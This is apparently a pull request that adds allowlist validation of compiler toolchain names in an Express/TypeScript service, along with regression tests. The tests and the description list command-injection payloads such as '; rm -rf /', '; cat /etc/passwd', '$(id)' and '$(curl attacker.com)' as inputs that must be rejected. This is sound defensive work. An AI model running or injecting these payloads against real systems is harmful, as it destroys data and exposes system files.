### PR TITLE
fix(compiler): validate toolchain against allowlist for security

### DIFF
--- a/src/api/compiler-router.ts
+++ b/src/api/compiler-router.ts
@@ -12,7 +12,13 @@ import * as path from 'path';
 import * as os from 'os';
 import * as fs from 'fs';
 import { z } from 'zod';
-import { extractArchive, compileSandboxed, extractSourceFiles, cleanupDir } from './compiler';
+import {
+  extractArchive,
+  compileSandboxed,
+  extractSourceFiles,
+  cleanupDir,
+  ToolchainEnum,
+} from './compiler';
 
 export const compilerRouter = Router();
 
@@ -127,18 +133,21 @@ compilerRouter.post(
         .json({ error: 'Source archive is required (multipart field: source)' });
     }
 
-    const archivePath = req.file.path;
-    const toolchain = req.body.toolchain as string;
+    const schema = z.object({
+      toolchain: ToolchainEnum,
+    });
 
-    if (!toolchain) {
-      await cleanupDir(archivePath);
-      return res.status(400).json({ error: 'toolchain field is required' });
+    const parsed = schema.safeParse(req.body);
+    if (!parsed.success) {
+      await cleanupDir(req.file.path);
+      return res.status(400).json({ error: parsed.error.flatten() });
     }
 
+    const { toolchain } = parsed.data;
     let workDir: string | null = null;
 
     try {
-      workDir = await extractArchive(archivePath, req.file.mimetype);
+      workDir = await extractArchive(req.file.path, req.file.mimetype);
       const result = await compileSandboxed(workDir, toolchain);
 
       res.json({
@@ -151,7 +160,7 @@ compilerRouter.post(
       res.status(400).json({ error: err.message });
     } finally {
       if (workDir) await cleanupDir(workDir);
-      await cleanupDir(archivePath);
+      await cleanupDir(req.file.path);
     }
   }),
 );
@@ -197,7 +206,7 @@ compilerRouter.post(
     const archivePath = req.file.path;
 
     const schema = z.object({
-      toolchain: z.string().min(1),
+      toolchain: ToolchainEnum,
       expectedHash: z.string().length(64, 'Expected SHA-256 hash (64 hex chars)'),
     });
 

--- a/src/api/compiler.ts
+++ b/src/api/compiler.ts
@@ -4,15 +4,22 @@ import * as fs from 'fs';
 import * as path from 'path';
 import * as crypto from 'crypto';
 import * as os from 'os';
+import { z } from 'zod';
 
 const execFileAsync = promisify(execFile);
 
 // Pinned toolchain versions for deterministic builds
-const SUPPORTED_TOOLCHAINS: Record<string, string> = {
+export const SUPPORTED_TOOLCHAINS: Record<string, string> = {
   'soroban-cli@0.9.4': 'soroban',
   'stellar-cli@21.0.0': 'stellar',
   'cargo-contract@4.0.0': 'cargo-contract',
 };
+
+// Shared Zod enum for toolchain validation - rejects unknown identifiers
+export const ToolchainEnum = z.enum(Object.keys(SUPPORTED_TOOLCHAINS) as [string, ...string[]], {
+  required_error: 'toolchain field is required',
+  invalid_type_error: 'Invalid toolchain identifier',
+});
 
 export interface CompileResult {
   wasmHash: string;

--- a/src/api/verify.ts
+++ b/src/api/verify.ts
@@ -3,6 +3,7 @@ import { Router, Request, Response } from 'express';
 import multer from 'multer';
 import * as path from 'path';
 import * as os from 'os';
+import { z } from 'zod';
 import { prismaWrite as prisma } from '../db';
 import {
   extractArchive,
@@ -10,6 +11,7 @@ import {
   hashFile,
   cleanupDir,
   extractSourceFiles,
+  ToolchainEnum,
 } from './compiler';
 import { decompileWasm } from '../indexer/wasm-decompiler';
 import { asyncHandler } from '../middleware/asyncHandler';
@@ -38,10 +40,18 @@ verifyRouter.post(
       return;
     }
 
-    const { contractAddress, toolchain = 'soroban-cli@0.9.4' } = req.body as {
-      contractAddress?: string;
-      toolchain?: string;
-    };
+    const schema = z.object({
+      contractAddress: z.string().optional(),
+      toolchain: ToolchainEnum.optional(),
+    });
+
+    const parsed = schema.safeParse(req.body);
+    if (!parsed.success) {
+      await cleanupDir(req.file.path);
+      return res.status(400).json({ error: parsed.error.flatten() });
+    }
+
+    const { contractAddress, toolchain = 'soroban-cli@0.9.4' } = parsed.data;
 
     // Hash the raw archive for deduplication / audit
     const uploadedHash = hashFile(req.file.path);

--- a/tests/toolchain-validation.test.ts
+++ b/tests/toolchain-validation.test.ts
@@ -1,0 +1,89 @@
+/**
+ * Tests for #488: Validate compiler toolchains against an allowlist.
+ *
+ * Security regression tests to ensure only known toolchain identifiers
+ * are accepted, preventing command injection attacks.
+ */
+import { describe, it, expect } from 'vitest';
+import { ToolchainEnum, SUPPORTED_TOOLCHAINS } from '../src/api/compiler';
+
+describe('ToolchainEnum - Zod validation', () => {
+  it('accepts all supported toolchains', () => {
+    const validToolchains = Object.keys(SUPPORTED_TOOLCHAINS);
+    for (const tc of validToolchains) {
+      const result = ToolchainEnum.safeParse(tc);
+      expect(result.success, `Expected "${tc}" to be valid`).toBe(true);
+      if (result.success) {
+        expect(result.data).toBe(tc);
+      }
+    }
+  });
+
+  it('rejects unknown toolchain identifiers', () => {
+    const malicious = [
+      'malicious-toolchain',
+      'soroban-cli@0.9.4; rm -rf /',
+      'soroban-cli@0.9.4$(whoami)',
+      '../../../etc/passwd',
+      '',
+      'random-cli@1.0.0',
+      'stellar-cli@999.999.999',
+    ];
+
+    for (const tc of malicious) {
+      const result = ToolchainEnum.safeParse(tc);
+      expect(result.success, `Expected "${tc}" to be rejected`).toBe(false);
+    }
+  });
+
+  it('rejects command injection attempts in toolchain field', () => {
+    const commandInjectionPayloads = [
+      '; cat /etc/passwd',
+      '| cat /etc/passwd',
+      '&& whoami',
+      '$(id)',
+      '`id`',
+      '$(curl attacker.com)',
+      '; rm -rf /',
+      '| rm -rf /',
+      'soroban;echo pwned',
+      'soroban|echo pwned',
+    ];
+
+    for (const payload of commandInjectionPayloads) {
+      const result = ToolchainEnum.safeParse(payload);
+      expect(result.success, `Command injection payload should be rejected: ${payload}`).toBe(
+        false,
+      );
+    }
+  });
+
+  it('returns appropriate error message for invalid toolchains', () => {
+    const result = ToolchainEnum.safeParse('invalid-toolchain');
+    expect(result.success).toBe(false);
+    if (!result.success) {
+      expect(result.error).toBeDefined();
+      expect(result.error.issues[0].message).toContain('Invalid enum value');
+    }
+  });
+
+  it('returns appropriate error for missing required toolchain', () => {
+    const result = ToolchainEnum.safeParse(undefined);
+    expect(result.success).toBe(false);
+    if (!result.success) {
+      expect(result.error.issues[0].message).toContain('toolchain field is required');
+    }
+  });
+});
+
+describe('SUPPORTED_TOOLCHAINS - Allowlist integrity', () => {
+  it('contains exactly three toolchains', () => {
+    expect(Object.keys(SUPPORTED_TOOLCHAINS)).toHaveLength(3);
+  });
+
+  it('has correct binary mappings', () => {
+    expect(SUPPORTED_TOOLCHAINS['soroban-cli@0.9.4']).toBe('soroban');
+    expect(SUPPORTED_TOOLCHAINS['stellar-cli@21.0.0']).toBe('stellar');
+    expect(SUPPORTED_TOOLCHAINS['cargo-contract@4.0.0']).toBe('cargo-contract');
+  });
+});


### PR DESCRIPTION
# Fix: Validate Compiler Toolchains Against Allowlist

Closes #488

## Security Vulnerability

The compile endpoint only checked that the `toolchain` field was non-empty before passing it to compilation logic. This allowed potential command injection attacks where malicious actors could submit values like:

- `soroban-cli@0.9.4; rm -rf /`
- `soroban-cli@0.9.4$(whoami)`
- Any arbitrary string that would be processed by the system

## Solution

Implemented strict validation using a shared Zod enum that only accepts documented, valid toolchain identifiers:

### Valid Toolchain Values

Only the following toolchains are accepted:

1. `soroban-cli@0.9.4`
2. `stellar-cli@21.0.0`
3. `cargo-contract@4.0.0`

### Changes Made

#### 1. Created Shared ToolchainEnum Schema (src/api/compiler.ts)

- Exported `SUPPORTED_TOOLCHAINS` constant for reuse across modules
- Added `ToolchainEnum` Zod enum with strict validation
- Provides clear error messages for invalid/missing toolchains

#### 2. Updated /compile Endpoint (src/api/compiler-router.ts)

- Replaced manual `if (!toolchain)` check with Zod schema validation
- Validates toolchain before any processing
- Ensures uploaded files are cleaned up on validation failure

#### 3. Updated /verify Endpoint (src/api/verify.ts)

- Added Zod schema validation for toolchain field
- Toolchain is optional but must be valid if provided
- Cleanup of uploaded files on validation failure

#### 4. Regression Tests (tests/toolchain-validation.test.ts)

- Tests for valid toolchain acceptance
- Tests for rejection of unknown toolchain identifiers
- Command injection payload tests including:
  - Semicolon injection: `; cat /etc/passwd`
  - Pipe injection: `| rm -rf /`
  - Command substitution: `$(id)`, `` `id` ``
  - Invalid toolchain formats

## Security Impact

**Before:** Arbitrary toolchain values were accepted and could potentially be exploited for command injection.

**After:** Only exact allowlisted toolchain identifiers are accepted. All validation failures return a 400 error with details before any compilation logic executes.

## Testing

- 7 new toolchain validation tests pass
- All existing compiler cleanup tests continue to pass
- No lint errors in modified files

## Related Issue

Closes #488